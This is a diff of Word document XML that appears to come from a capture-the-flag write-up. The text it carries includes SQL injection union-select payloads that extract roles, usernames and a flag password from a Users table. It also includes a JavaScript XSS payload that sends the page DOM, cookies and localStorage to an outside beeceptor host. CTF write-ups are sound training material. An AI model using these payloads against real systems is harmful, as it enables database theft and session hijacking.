+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Users' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12309,7 +13760,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"api", "id", "password", "probation", "</w:t>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>", "id", "password", "probation", "</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12419,7 +13884,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12455,7 +13940,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> having substr(</w:t>
+              <w:t xml:space="preserve"> having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12535,7 +14040,47 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, roles from Users having substr(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, roles from Users having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12694,7 +14239,38 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,roles,username from Users having</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,roles</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,username</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Users having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12705,14 +14281,25 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr(username,1,</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(username,1,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12732,6 +14319,7 @@
               </w:rPr>
               <w:t>)=BINARY '</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12741,6 +14329,7 @@
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12819,7 +14408,78 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select NULL,username,password from Users having substr(password,1,32)=BINARY 'FLAG{Wear_some_glasses_minions!}' and </w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,username</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,password</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Users having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Wear_some_glasses_minions</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">!}' and </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12829,7 +14489,27 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>username=BINARY 'prodigysml' limit 1 --+</w:t>
+              <w:t>username=BINARY '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>prodigysml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12857,12 +14537,14 @@
               </w:rPr>
               <w:t>eaks out the password of “</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -12879,7 +14561,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>FLAG{Wear_some_glasses_minions!}</w:t>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Wear_some_glasses_minions</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12916,7 +14612,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId18" cstate="print">
+                          <a:blip r:embed="rId21" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -13040,12 +14736,21 @@
         </w:rPr>
         <w:t>`</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>py sqli.py</w:t>
+        <w:t>py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sqli.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13413,140 +15118,412 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var serializer = new XMLSerializer();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhttp.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhttp.send(</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "dom=" + serializer.serializeToString(document) +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;cookie=" + document.cookie +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;localStorage=" + JSON.stringify(localStorage));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhttp.send();</w:t>
+              <w:t xml:space="preserve">  var serializer = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLSerializer</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>dom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>serializer.serializeToString</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
